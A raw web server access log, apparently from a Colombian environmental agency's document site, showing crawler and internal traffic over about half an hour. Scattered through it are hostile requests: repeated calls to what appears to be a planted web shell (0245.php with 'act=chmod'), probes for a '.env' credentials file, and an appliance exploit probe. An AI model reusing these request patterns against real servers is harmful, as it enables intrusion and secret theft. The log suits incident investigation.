201.245.192.253 - - [29/Jun/2024:01:48:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:01:46:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.11 - - [29/Jun/2024:01:48:50 -0500] "GET /isolucionsda/Arriba.asp?Pagina=/isolucionsda/BancoConocimiento/A/Acuerdo130dediciembre7de2004/Acuerdo130dediciembre7de2004.asp&IdArticulo=544 HTTP/1.1" 200 527
172.22.2.4 - - [29/Jun/2024:01:47:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
201.245.192.253 - - [29/Jun/2024:01:49:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [29/Jun/2024:01:49:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201701-1750/20021703.tif HTTP/1.1" 200 144798
201.245.192.253 - - [29/Jun/2024:01:49:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:01:50:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [29/Jun/2024:01:50:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3956.pdf HTTP/1.1" 200 420418
66.249.66.11 - - [29/Jun/2024:01:50:51 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202022/&sort=name&order=asc HTTP/1.1" 200 330769
201.245.192.253 - - [29/Jun/2024:01:51:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:01:51:25 -0500] "GET /BLA/resoluciones/AUTOS%202023/3692.pdf HTTP/1.1" 200 430942
216.245.221.92 - - [29/Jun/2024:01:51:51 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.12 - - [29/Jun/2024:01:51:51 -0500] "GET /Publicaciones/2024EE93818.pdf HTTP/1.1" 404 227
201.245.192.253 - - [29/Jun/2024:01:51:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:01:52:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [29/Jun/2024:01:52:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/00742.pdf HTTP/1.1" 200 600631
201.245.192.253 - - [29/Jun/2024:01:52:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.244.66.195 - - [29/Jun/2024:01:52:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/01018.pdf HTTP/1.1" 200 458836
201.245.192.253 - - [29/Jun/2024:01:53:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [29/Jun/2024:01:53:26 -0500] "GET /BLA/resoluciones/AUTOS%202024/01603.pdf HTTP/1.1" 200 420240
51.222.9.15 - - [29/Jun/2024:01:53:41 -0500] "GET /Publicaciones/2023EE19229.pdf HTTP/1.1" 404 227
66.249.66.11 - - [29/Jun/2024:01:53:52 -0500] "GET /BLA/resoluciones/index.php?dir=&sort=date&order=desc HTTP/1.1" 200 14104
66.249.66.11 - - [29/Jun/2024:01:53:52 -0500] "GET /Publicaciones/2024EE90603.pdf HTTP/1.1" 404 227
172.22.2.4 - - [29/Jun/2024:01:52:12 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:01:53:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:01:54:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [29/Jun/2024:01:54:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201451-1500/20021472.tif HTTP/1.1" 200 152436
172.22.2.4 - - [29/Jun/2024:01:53:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59583
66.249.66.11 - - [29/Jun/2024:01:54:52 -0500] "GET /Publicaciones/2024EE94514.pdf HTTP/1.1" 404 227
201.245.192.253 - - [29/Jun/2024:01:55:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:01:55:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2234.pdf HTTP/1.1" 200 356180
172.22.2.4 - - [29/Jun/2024:01:55:40 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1018
66.249.66.11 - - [29/Jun/2024:01:55:52 -0500] "GET /Publicaciones/2024EE91332.pdf HTTP/1.1" 404 227
66.249.66.11 - - [29/Jun/2024:01:55:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1070.pdf HTTP/1.1" 200 539358
201.245.192.253 - - [29/Jun/2024:01:55:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:01:56:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.33.245 - - [29/Jun/2024:01:56:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3755.pdf HTTP/1.1" 200 2739
47.128.28.54 - - [29/Jun/2024:01:56:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=4275.pdf HTTP/1.1" 200 2714
66.249.66.12 - - [29/Jun/2024:01:56:30 -0500] "GET /Publicaciones/2024EE92591.pdf HTTP/1.1" 404 227
47.128.99.105 - - [29/Jun/2024:01:56:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=03266.pdf HTTP/1.1" 200 2714
216.245.221.92 - - [29/Jun/2024:01:56:51 -0500] "HEAD / HTTP/1.1" 200 -
47.128.27.228 - - [29/Jun/2024:01:56:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=6856.pdf HTTP/1.1" 200 2714
201.245.192.253 - - [29/Jun/2024:01:57:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.28.220 - - [29/Jun/2024:01:57:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=2842.pdf HTTP/1.1" 200 2714
201.245.192.253 - - [29/Jun/2024:01:57:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
52.167.144.221 - - [29/Jun/2024:01:57:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/4632.pdf HTTP/1.1" 304 -
47.128.116.142 - - [29/Jun/2024:01:57:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3425.pdf HTTP/1.1" 200 2714
216.244.66.195 - - [29/Jun/2024:01:57:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/3800.pdf HTTP/1.1" 200 390557
66.249.66.11 - - [29/Jun/2024:01:57:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2366.pdf HTTP/1.1" 200 547661
66.249.66.12 - - [29/Jun/2024:01:57:44 -0500] "GET /Publicaciones/2024EE92568.pdf HTTP/1.1" 404 227
47.128.24.103 - - [29/Jun/2024:01:57:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=5052.pdf HTTP/1.1" 200 2714
201.245.192.253 - - [29/Jun/2024:01:57:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:01:58:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.126.132 - - [29/Jun/2024:01:58:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=4466.pdf HTTP/1.1" 200 2740
47.128.98.237 - - [29/Jun/2024:01:58:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=4356.pdf HTTP/1.1" 200 2714
47.128.59.63 - - [29/Jun/2024:01:58:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3032.PDF HTTP/1.1" 200 2901
47.128.49.30 - - [29/Jun/2024:01:58:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3257.pdf HTTP/1.1" 200 2714
66.249.66.13 - - [29/Jun/2024:01:58:58 -0500] "GET /Publicaciones/2024EE93057.pdf HTTP/1.1" 404 227
201.245.192.253 - - [29/Jun/2024:01:59:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:01:59:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20401-450/00000428.tif HTTP/1.1" 200 61424
47.128.49.165 - - [29/Jun/2024:01:59:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=02040.pdf HTTP/1.1" 200 2714
47.128.28.233 - - [29/Jun/2024:01:59:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3638.pdf HTTP/1.1" 200 2740
172.22.2.4 - - [29/Jun/2024:01:58:02 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.49.35 - - [29/Jun/2024:01:59:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=6781.pdf HTTP/1.1" 200 2714
201.245.192.253 - - [29/Jun/2024:01:59:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:02:00:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.127.90 - - [29/Jun/2024:02:00:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=6865.pdf HTTP/1.1" 200 2714
66.249.66.13 - - [29/Jun/2024:02:00:11 -0500] "GET /Publicaciones/2024EE91312.pdf HTTP/1.1" 404 227
47.128.124.26 - - [29/Jun/2024:02:00:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3775.pdf HTTP/1.1" 200 2714
172.22.2.4 - - [29/Jun/2024:01:58:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
47.128.55.36 - - [29/Jun/2024:02:00:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=6781.pdf HTTP/1.1" 200 2740
47.128.124.231 - - [29/Jun/2024:02:00:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=03873.pdf HTTP/1.1" 200 2741
201.245.192.253 - - [29/Jun/2024:02:01:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.59.218 - - [29/Jun/2024:02:01:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3159.pdf HTTP/1.1" 200 2739
172.22.2.4 - - [29/Jun/2024:02:01:22 -0500] "GET /BLA/boletinlegal/.env HTTP/1.1" 404 1018
66.249.66.12 - - [29/Jun/2024:02:01:25 -0500] "GET /autoliquidacion/index.php?dir=TR%C1MITES%20ACEITES-RESIDUOS-ESTACIONES/&sort=size&order=desc HTTP/1.1" 200 3112
47.128.124.223 - - [29/Jun/2024:02:01:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=1613.PDF HTTP/1.1" 200 2901
47.128.97.243 - - [29/Jun/2024:02:01:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3049.pdf HTTP/1.1" 200 2714
216.245.221.92 - - [29/Jun/2024:02:01:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:02:01:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [29/Jun/2024:02:01:24 -0500] "POST /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [29/Jun/2024:02:01:59 -0500] "GET /BLA/boletinlegal/Circulares/2024/CIRCULAR%20No.%2000001%20DEL%2011%20DE%20ENERO%20DEL%202024.pdf HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:02:02:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.97.171 - - [29/Jun/2024:02:02:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3649.pdf HTTP/1.1" 200 2714
47.128.97.200 - - [29/Jun/2024:02:02:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3776.pdf HTTP/1.1" 200 2740
47.128.25.132 - - [29/Jun/2024:02:02:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3386.pdf HTTP/1.1" 200 2740
66.249.66.12 - - [29/Jun/2024:02:02:39 -0500] "GET /isolucionsda/FrameSetArticulo.asp?Pagina=/isolucionsda/BancoConocimiento/R/Resolucion2400de22demayode1979/Resolucion2400de22demayode1979.asp?IdArticulo=2789 HTTP/1.1" 200 527
47.128.44.81 - - [29/Jun/2024:02:02:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=03823.pdf HTTP/1.1" 200 2741
201.245.192.253 - - [29/Jun/2024:02:03:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.45.83 - - [29/Jun/2024:02:03:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=5150.pdf HTTP/1.1" 200 2740
66.249.66.37 - - [29/Jun/2024:02:03:18 -0500] "GET /desde-el-1-de-mayo-habra-nueva-normativa-para-la-gestion-de-aceites-usados-de-origen-industrial.html HTTP/1.1" 200 1006
168.119.252.243 - - [29/Jun/2024:02:03:29 -0500] "GET / HTTP/1.1" 200 4720
47.128.126.156 - - [29/Jun/2024:02:03:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3020.PDF HTTP/1.1" 200 2741
47.128.39.182 - - [29/Jun/2024:02:03:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=5157.pdf HTTP/1.1" 200 2714
66.249.66.13 - - [29/Jun/2024:02:03:53 -0500] "GET /isolucionsda/FrameSetArticulo.asp?Pagina=/ISOlucionSDA/bancoconocimiento/R/Resolucion1602dediciembre10de2001/Resolucion1602dediciembre10de2001.asp?IdArticulo=355 HTTP/1.1" 200 527
216.244.66.195 - - [29/Jun/2024:02:03:54 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [29/Jun/2024:02:03:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.12 - - [29/Jun/2024:02:03:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20601-650/00000628.tif HTTP/1.1" 200 38332
201.245.192.253 - - [29/Jun/2024:02:04:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.99.82 - - [29/Jun/2024:02:04:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=6849.pdf HTTP/1.1" 200 2740
201.245.192.253 - - [29/Jun/2024:02:02:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [29/Jun/2024:02:04:16 -0500] "GET /BLA/boletinlegal/.env HTTP/1.1" 404 1018
47.128.39.107 - - [29/Jun/2024:02:04:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=2853.pdf HTTP/1.1" 200 2740
201.245.192.253 - - [29/Jun/2024:02:05:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:02:05:07 -0500] "GET /isolucionsda/FrameSetArticulo.asp?Pagina=/isolucionsda/bancoconocimiento/D/Decreto1791del4deOctubrede1996/Decreto1791del4deOctubrede1996.asp?IdArticulo=6342 HTTP/1.1" 200 527
66.249.66.13 - - [29/Jun/2024:02:05:27 -0500] "GET /BLA/resoluciones/AUTOS%202023/2825.pdf HTTP/1.1" 200 904725
172.22.2.4 - - [29/Jun/2024:02:03:52 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:02:05:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:02:06:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [29/Jun/2024:02:06:21 -0500] "GET /isolucionsda/FrameSetArticulo.asp?Pagina=/isolucionsda/bancoconocimiento/D/Decreto1848del4deNoviembrede1969/Decreto1848del4deNoviembrede1969.asp?IdArticulo=6343 HTTP/1.1" 200 527
172.22.2.4 - - [29/Jun/2024:02:04:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54300
216.245.221.92 - - [29/Jun/2024:02:06:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:02:07:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
45.159.223.164 - - [29/Jun/2024:02:07:18 -0500] "GET /Publicaciones/2023EE16233.pdf HTTP/1.1" 404 227
66.249.66.12 - - [29/Jun/2024:02:07:35 -0500] "GET /autoliquidacion/index.php?dir=Solicitudes+relacionadas+con+calidad+del+aire+auditiva+y+visual%2FEvaluaci%F3n+de+estudios+de+Emisiones+con+miras+a+verificar+el+cumplimiento+de+las+normas+de+emisiones%2F HTTP/1.1" 200 3251
201.245.192.253 - - [29/Jun/2024:02:07:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:02:08:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [29/Jun/2024:02:08:49 -0500] "GET /autoliquidacion/index.php?dir=Solicitudes+relacionadas+con+calidad+del+aire+auditiva+y+visual%2FSolicitudes+relacionadas+a+Programa+de+Autorregulaci%F3n+Ambiental%2F HTTP/1.1" 200 3841
201.245.192.253 - - [29/Jun/2024:02:09:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:02:09:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5290.pdf HTTP/1.1" 200 344869
201.245.192.253 - - [29/Jun/2024:02:07:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.13 - - [29/Jun/2024:02:09:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20601-650/00000623.tif HTTP/1.1" 200 38542
201.245.192.253 - - [29/Jun/2024:02:09:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:02:10:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:02:10:03 -0500] "GET /PDC/PLAN%20DE%20CONTRATACION%202012%20SDA.xlsx HTTP/1.1" 404 1018
66.249.66.13 - - [29/Jun/2024:02:10:28 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-146-16.docx HTTP/1.1" 304 -
66.249.66.12 - - [29/Jun/2024:02:10:51 -0500] "GET /BLA/resoluciones/AUTOS%202020/1172.pdf HTTP/1.1" 200 347030
201.245.192.253 - - [29/Jun/2024:02:11:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:02:11:00 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/analisis%20C-595-2010.doc HTTP/1.1" 304 -
66.249.66.13 - - [29/Jun/2024:02:11:17 -0500] "GET /BLA/boletinlegal/conceptos/2012/107.pdf HTTP/1.1" 200 1030030
172.22.2.4 - - [29/Jun/2024:02:09:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.11 - - [29/Jun/2024:02:11:31 -0500] "GET /BLA/resoluciones/AUTOS%202024/02255.pdf HTTP/1.1" 304 -
216.245.221.92 - - [29/Jun/2024:02:11:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:02:11:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:02:12:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:02:10:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
66.249.66.11 - - [29/Jun/2024:02:12:31 -0500] "GET /Publicaciones/2024EE97429.pdf HTTP/1.1" 404 227
201.245.192.253 - - [29/Jun/2024:02:13:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [29/Jun/2024:02:13:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1261.pdf HTTP/1.1" 200 423093
66.249.66.11 - - [29/Jun/2024:02:13:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5604.pdf HTTP/1.1" 200 431269
66.249.66.11 - - [29/Jun/2024:02:13:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201451-1500/20021476.tif HTTP/1.1" 200 69022
66.249.66.11 - - [29/Jun/2024:02:13:45 -0500] "GET /BLA/resoluciones/AUTOS%202023/05929.pdf HTTP/1.1" 200 666992
201.245.192.253 - - [29/Jun/2024:02:13:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:02:14:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:02:12:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.12 - - [29/Jun/2024:02:14:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202024/00651.pdf HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:02:15:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
65.21.136.254 - - [29/Jun/2024:02:15:49 -0500] "GET /Publicaciones/2023EE19235.pdf HTTP/1.1" 404 227
201.245.192.253 - - [29/Jun/2024:02:15:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:02:16:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:02:16:13 -0500] "GET /autoliquidacion/index.php?dir=Solicitudes%20relacionadas%20con%20calidad%20del%20aire%20auditiva%20y%20visual/Evaluaci%F3n%20de%20estudios%20de%20Emisiones%20con%20miras%20a%20verificar%20el%20cumplimiento%20de%20las%20normas%20de%20emisiones/&sort=name&order=desc HTTP/1.1" 200 3250
216.245.221.92 - - [29/Jun/2024:02:16:51 -0500] "HEAD / HTTP/1.1" 200 -
185.191.126.213 - - [29/Jun/2024:02:16:56 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [29/Jun/2024:02:17:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [29/Jun/2024:02:17:02 -0500] "GET /BLA/resoluciones/AUTOS%202016/2930.pdf HTTP/1.1" 200 405600
66.249.66.12 - - [29/Jun/2024:02:17:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2629.pdf HTTP/1.1" 200 361189
172.22.2.4 - - [29/Jun/2024:02:15:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:02:17:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [29/Jun/2024:02:17:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36531
201.245.192.253 - - [29/Jun/2024:02:17:13 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35408
66.249.66.11 - - [29/Jun/2024:02:17:27 -0500] "GET /autoliquidacion/index.php?dir=Solicitudes%20relacionadas%20con%20calidad%20del%20aire%20auditiva%20y%20visual/Evaluaci%F3n%20de%20estudios%20de%20Emisiones%20con%20miras%20a%20verificar%20el%20cumplimiento%20de%20las%20normas%20de%20emisiones/&sort=date&order=asc HTTP/1.1" 200 3251
216.244.66.195 - - [29/Jun/2024:02:17:50 -0500] "GET /BLA/resoluciones/AUTOS%202016/2970.pdf HTTP/1.1" 200 527441
201.245.192.253 - - [29/Jun/2024:02:17:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:02:18:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:02:16:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55823
66.249.66.11 - - [29/Jun/2024:02:18:20 -0500] "GET /BLA/resoluciones/AUTOS%202020/0754.pdf HTTP/1.1" 200 366520
66.249.66.11 - - [29/Jun/2024:02:18:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201301-1350/20021332.tif HTTP/1.1" 200 104980
216.244.66.195 - - [29/Jun/2024:02:18:40 -0500] "GET /BLA/resoluciones/AUTOS%202016/3017.pdf HTTP/1.1" 200 412908
66.249.66.11 - - [29/Jun/2024:02:18:41 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202022/&sort=date&order=asc HTTP/1.1" 200 330769
201.245.192.253 - - [29/Jun/2024:02:19:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:02:19:28 -0500] "GET /BLA/resoluciones/AUTOS%202023/2920.pdf HTTP/1.1" 200 412809
216.244.66.195 - - [29/Jun/2024:02:19:31 -0500] "GET /BLA/resoluciones/AUTOS%202010/3740.pdf HTTP/1.1" 200 218025
201.245.192.253 - - [29/Jun/2024:02:19:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35534
201.245.192.253 - - [29/Jun/2024:02:19:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.11 - - [29/Jun/2024:02:19:55 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202022/&sort=size&order=asc HTTP/1.1" 200 330769
201.245.192.253 - - [29/Jun/2024:02:20:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [29/Jun/2024:02:20:09 -0500] "GET /BLA/resoluciones/AUTOS%202010/6766.pdf HTTP/1.1" 200 527118
45.148.10.174 - - [29/Jun/2024:02:20:22 -0500] "POST /cmd,/simZysh/register_main/setCookie HTTP/1.1" 404 1018
172.22.2.4 - - [29/Jun/2024:02:20:54 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20ANALISIS%20SENTENCIA%20C-554%20DE%202007.doc HTTP/1.1" 304 -
